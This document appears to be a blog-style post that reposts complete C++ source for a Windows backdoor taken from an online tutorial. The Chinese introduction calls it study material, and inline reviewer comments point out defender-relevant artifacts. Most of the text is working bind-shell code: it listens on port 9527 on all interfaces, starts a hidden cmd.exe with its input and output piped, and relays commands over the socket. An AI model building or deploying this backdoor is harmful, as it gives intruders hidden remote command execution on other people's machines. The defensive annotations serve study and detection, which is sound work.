平日无聊时从网络上看的一个教程中所写的后门代码。这仅仅只能作为学习所用。但是麻雀虽小，五脏俱全。
包含了套接字通信、通道等知识。没有注释。这东西有需要的人才看。
A BackDoor reference the writer of syc
//////////////////////////////////////////////////////////////////////////////////
//a simple backdoor reference the tutotial from web
//thanks for the writer syc
//by chenqiangdage
//////////////////////////////////////////////////////////////////////////////////
// Reviewer note: tutorial Windows bind shell. StartShell() listens on a TCP port,
// accepts a single client, starts a hidden cmd.exe whose standard handles are
// anonymous pipes, and bridges pipe <-> socket with two threads.
// Defender-relevant artifacts visible in this file: a process holding a
// listening socket (port 9527 in main()) that is the parent of cmd.exe started
// with SW_HIDE and STARTF_USESTDHANDLES, and the ws2_32 import.
#pragma once
#pragma comment(lib,"ws2_32.lib")
#include<windows.h>
#include<stdio.h>
#include<string.h>
// Shared stop flag: set by ThreadInPutProc when the socket closes, polled by
// ThreadOutPutProc. Plain (non-atomic) bool.
bool bExit=false;
// Size of the chunk ThreadOutPutProc reads from the shell's output pipe.
#define RECV_BUF_LEN 4096
// Declared but not referenced anywhere in this file.
char szCmdBuf[MAX_PATH]={0};
// Argument passed to each bridge thread: the pipe end that thread uses plus
// the accepted client socket.
class ThreadNode{
public:
    HANDLE hPipe;    // pipe handle this thread reads from or writes to
    SOCKET msocket;  // accepted client socket
    ThreadNode()
    {
        hPipe=NULL;
        msocket=INVALID_SOCKET;
    }
};
// Initialise Winsock 2.2.
// Returns true on success, false if WSAStartup fails. The condition applies
// '!' before comparing with NO_ERROR, so it reads as "WSAStartup(...) != 0".
bool SocketInit()
{
    DWORD SocketVersion;
    WSADATA WsaData;
    SocketVersion=MAKEWORD(2,2);
    if(!WSAStartup(SocketVersion,&WsaData)==NO_ERROR)
    {
        return false;
    }
    else
    {
        return true;
    }
}
// Send dwBuffLen bytes from pBuf on socket, looping on partial sends.
// Returns the number of bytes actually sent, or -1 on invalid arguments.
// Stops early (returning the partial count) when send() returns <= 0.
int SendData(SOCKET socket,void *pBuf,DWORD dwBuffLen)
{
    if(socket==INVALID_SOCKET||!pBuf||dwBuffLen<=0) return -1;
    int iCurrentSend=0,offset=0;
    do
    {
        // dwBuffLen is decremented and the pointer advanced by offset, so each
        // call sends only the remaining bytes.
        iCurrentSend=send(socket,(char*)pBuf+offset,dwBuffLen,0);
        if(iCurrentSend<=0) break;
        dwBuffLen-=iCurrentSend;
        offset+=iCurrentSend;
    }while(dwBuffLen>0);
    return offset;
}
// Socket -> shell stdin bridge thread.
// lpParam points to a ThreadNode whose hPipe is the write end of the stdin pipe.
// Blocks in recv(); whatever arrives is written to the pipe. When recv()
// returns 0 or SOCKET_ERROR the socket is closed, "exit\r\t" (sizeof includes
// the terminating NUL) is written to the shell, bExit is set and the thread ends.
DWORD WINAPI ThreadInPutProc(LPVOID lpParam)
{
    ThreadNode tnode=*(ThreadNode *)lpParam;
    DWORD dwWrited=0,dwRecvd=0;
    char szBuf[MAX_PATH]={0};
    bool bRet=false;
    while(true)
    {
        dwRecvd=recv(tnode.msocket ,szBuf,MAX_PATH,0);
        // dwRecvd is unsigned, so the explicit SOCKET_ERROR test is what
        // excludes a failed recv(); ">0" alone would not.
        if(dwRecvd>0&&dwRecvd!=SOCKET_ERROR)
        {
            WriteFile(tnode.hPipe ,szBuf,dwRecvd,&dwWrited,NULL);
        }
        else
        {
            closesocket(tnode.msocket );
            WriteFile(tnode.hPipe ,"exit\r\t",sizeof("exit\r\t"),&dwWrited,NULL);
            bExit=true;
            break;
        }
        Sleep(50);
    }
    return true;
}
// Shell stdout/stderr -> socket bridge thread.
// lpParam points to a ThreadNode whose hPipe is the read end of the output pipe.
// Polls the pipe with PeekNamedPipe; when bytes are available reads up to
// RECV_BUF_LEN of them and forwards them with SendData. Runs until bExit is set.
// Sleep(50) sits inside the data-available branch, so the loop spins while the
// pipe is empty.
DWORD WINAPI ThreadOutPutProc(LPVOID lpParam)
{
    ThreadNode tnode=*(ThreadNode *)lpParam;
    char szBuf[RECV_BUF_LEN]={0};
    DWORD dwReadLen,dwTotalAvail;
    dwReadLen=dwTotalAvail=0;
    bool bRet=false;
    while(!bExit)
    {
        dwTotalAvail=0;
        bRet=PeekNamedPipe(tnode.hPipe ,NULL,0,NULL,&dwTotalAvail,NULL);
        if(bRet&&dwTotalAvail>0)
        {
            bRet=ReadFile(tnode.hPipe ,szBuf,RECV_BUF_LEN,&dwReadLen,NULL);
            if(bRet&&dwReadLen>0)
            {
                SendData(tnode.msocket ,szBuf,dwReadLen);
            }
            Sleep(50);
        }
    }
    return true;
}
// Listen on uport on all interfaces, accept one client, start a hidden cmd.exe
// from the system directory with its std handles redirected to inheritable
// anonymous pipes, then run the two bridge threads.
// Returns false on any setup failure (sockets/handles opened before the failure
// are not closed on those paths), true after WaitForMultipleObjects returns.
bool StartShell(UINT uport)
{
    if(!SocketInit()) return false;
    SOCKET ListenSocket=socket(AF_INET,SOCK_STREAM,0);
    sockaddr_in sServer;
    // INADDR_ANY: the listener is reachable on every local address, not just
    // loopback — the network-facing artifact a defender would look for.
    sServer.sin_addr .S_un .S_addr =htonl(INADDR_ANY);
    sServer.sin_family =AF_INET;
    sServer.sin_port =htons(uport);
    if(bind(ListenSocket,(sockaddr*)&sServer,sizeof(sServer))==SOCKET_ERROR)
    {
        return false;
    }
    if(listen(ListenSocket,5)==SOCKET_ERROR)
    {
        return false;
    }
    // Blocks until exactly one client connects; no further accept() is made.
    SOCKET AcceptSocket=accept(ListenSocket,NULL,0);
    // Pipe 1: parent writes, child reads (stdin). Pipe 2: child writes
    // (stdout/stderr), parent reads.
    HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    SECURITY_ATTRIBUTES sa;
    // Handles must be inheritable for the child to receive them as std handles.
    sa.bInheritHandle =true;
    sa.lpSecurityDescriptor =NULL;
    sa.nLength =sizeof(SECURITY_ATTRIBUTES);
    if(!CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0)|| !CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))
    {
        return false;
    }
    // Full path "<system dir>\cmd.exe"; GetSystemDirectory's return value is
    // not checked.
    char mCmdLine[MAX_PATH]={0};
    GetSystemDirectory(mCmdLine,MAX_PATH);
    strcat(mCmdLine,"\\cmd.exe");
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    si.cb =sizeof(STARTUPINFO);
    GetStartupInfo(&si);
    // Hidden window plus redirected std handles — the process-creation
    // pattern that distinguishes this child from an interactive cmd.exe.
    si.dwFlags =STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    si.wShowWindow =SW_HIDE;
    si.hStdInput =hReadPipe1;
    si.hStdOutput =si.hStdError =hWritePipe2;
    // bInheritHandles=true hands the pipe ends to the child.
    if(!CreateProcess(mCmdLine,NULL,NULL,NULL,true,NULL,NULL,NULL,&si,&pi))
    {return false;}
    HANDLE hThreadOutPut,hThreadInPut;
    DWORD ThreadID;
    ThreadNode mWriteNode,mReadNode;
    mWriteNode.hPipe= hWritePipe1;   // socket -> stdin thread writes here
    mReadNode.hPipe =hReadPipe2;     // stdout -> socket thread reads here
    mReadNode.msocket =mWriteNode.msocket =AcceptSocket;
    hThreadOutPut=CreateThread(NULL,0,ThreadOutPutProc,&mReadNode,true,&ThreadID);
    hThreadInPut=CreateThread(NULL,0,ThreadInPutProc,&mWriteNode,true,&ThreadID);
    // Main thread blocks here until both bridge threads have exited.
    HANDLE Handles[]={hThreadOutPut,hThreadInPut};
    WaitForMultipleObjects(2,Handles,TRUE,INFINITE);
    return true;
}
// Entry point: hard-coded listening port 9527. The parameter names are swapped
// relative to the conventional argc/argv; neither is used.
int main(int argv,char *garc[])
{
    StartShell(9527);
    return 0;
}